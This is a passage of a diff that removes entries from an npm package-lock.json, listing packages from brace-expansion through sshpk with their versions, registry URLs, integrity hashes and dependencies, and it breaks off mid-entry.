"https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/minizlib/node_modules/glob": { - "version": "10.3.12", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.3.12.tgz", - "integrity": "sha512-TCNv8vJ+xz4QiqTpfOJA7HvYv+tNIRHKfUWw/q+v2jdgN4ebz+KY9tGx5J4rHP0o84mNP+ApH66HRX8us3Khqg==", - "dependencies": { - "foreground-child": "^3.1.0", - "jackspeak": "^2.3.6", - "minimatch": "^9.0.1", - "minipass": "^7.0.4", - "path-scurry": "^1.10.2" - }, - "bin": { - "glob": "dist/esm/bin.mjs" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minizlib/node_modules/minimatch": { - "version": "9.0.4", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.4.tgz", - "integrity": "sha512-KqWh+VchfxcMNRAJjj2tnsSJdNbHsVgnkBhTNrW7AjVo6OvLtxw8zfT9oLw1JSohlFzJ8jCoTgaoXvJ+kHt6fw==", - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/minizlib/node_modules/rimraf": { - "version": "5.0.5", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.5.tgz", - "integrity": "sha512-CqDakW+hMe/Bz202FPEymy68P+G50RfMQK+Qo5YUqc9SPipvbGjCGKd0RSKEelbsfQuw3g5NZDSrlZZAJurH1A==", - "dependencies": { - "glob": "^10.3.7" - }, - "bin": { - "rimraf": "dist/esm/bin.mjs" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==", - "bin": { - "mkdirp": "dist/cjs/src/bin.js" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha1-Sr6/7tdUHywnrPspvbvRXI1bpPc=", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.14", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.14.tgz", - "integrity": "sha512-y10wOWt8yZpqXmOgRo77WaHEmhYQYGNA6y421PKsKYWEK8aW+cqAphborZDhqfyKrbZEN92CN1X2KbafY2s7Yw==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/oauth4webapi": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.2.tgz", - "integrity": "sha512-KQZkNU+xn02lWrFu5Vjqg9E81yPtDSxUZorRHlLWVoojD+H/0GFbH59kcnz5Thdjj7c4/mYMBPj/mhvGe/kKXA==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "dependencies": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/optionator": { - "version": "0.9.1", - "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.1.tgz", - "integrity": "sha512-74RlY5FCnhq4jRxVUPKDaRwrVNXMqsGsiW6AJw4XK8hmtm10wC0ypZBLw5IIp85NZMr91+qd1RvvENwg7jjRFw==", - "dev": true, - "peer": true, - "dependencies": { - "deep-is": "^0.1.3", - "fast-levenshtein": "^2.0.6", - "levn": "^0.4.1", - "prelude-ls": "^1.2.1", - "type-check": "^0.4.0", - "word-wrap": "^1.2.3" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parent-module": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", - "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", - "dev": true, - "dependencies": { - "callsites": "^3.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/path-scurry": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.10.2.tgz", - "integrity": "sha512-7xTavNy5RQXnsjANvVvMkEjvloOinkAjv/Z6Ildz9v2RinZ4SBKTWFOVRbaF8p0vpHnyjV/UwNDdKuUv6M5qcA==", - "dependencies": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "engines": { - "node": ">=16 || 14 >=14.17" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/path-scurry/node_modules/lru-cache": { - "version": "10.2.2", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.2.2.tgz", - "integrity": "sha512-9hp3Vp2/hFQUiIwKo8XCeFVnrg8Pk3TYNPIR7tJADKi5YfcF7vEaK7avFHTlSy3kOKYaJQaalfEo6YuXdceBOQ==", - "engines": { - "node": "14 || >=16.14" - } - }, - "node_modules/path-type": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", - "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/prelude-ls": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", - "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", - "dev": true, - "peer": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", - "dev": true, - "bin": { - "prettier": "bin/prettier.cjs" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/prettier/prettier?sponsor=1" - } - }, - "node_modules/pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/progress": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/progress/-/progress-2.0.3.tgz", - "integrity": "sha512-7PiHtLll5LdnKIMw100I+8xJXR5gW2QwWYkT6iJva0bXitZKa/XMrSbdmg3r2Xnaidz9Qumd0VPaMrZlF9V9sA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "engines": { - "node": ">=6" - } - }, - "node_modules/pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/regexpp": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/regexpp/-/regexpp-3.2.0.tgz", - "integrity": "sha512-pq2bWo9mVD43nbts2wGv17XLiNLya+GklZ8kaDLV2Z08gDCsGpnKn9BFMepvWuHCbyVvY7J5o5+BVvoQbmlJLg==", - "dev": true, - "peer": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/mysticatea" - } - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/require-from-string": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", - "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "dependencies": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-cwd/node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", - "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/rfc4648": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.3.tgz", - "integrity": "sha512-MjOWxM065+WswwnmNONOT+bD1nXzY9Km6u3kzvnx8F8/HXGZdz3T6e6vZJ8Q/RIMUSp/nxqjH3GwvJDy8ijeQQ==" - }, - "node_modules/rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "dev": true, - "peer": true, - "dependencies": { - "glob": "^7.1.3" - }, - "bin": { - "rimraf": "bin.js" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/slice-ansi": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-4.0.0.tgz", - "integrity": "sha512-qMCMfhY040cVHT43K9BFygqYbUPFZKHOg7K73mtTWJRb8pyP3fzf4Ixd5SzdEJQ6MRUg/WBnOLxghZtKKurENQ==", - "dev": true, - "peer": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "astral-regex": "^2.0.0", - "is-fullwidth-code-point": "^3.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/slice-ansi?sponsor=1" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=", - "dev": true - }, - "node_modules/sshpk": { - "version": "1.18.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", - "integrity": 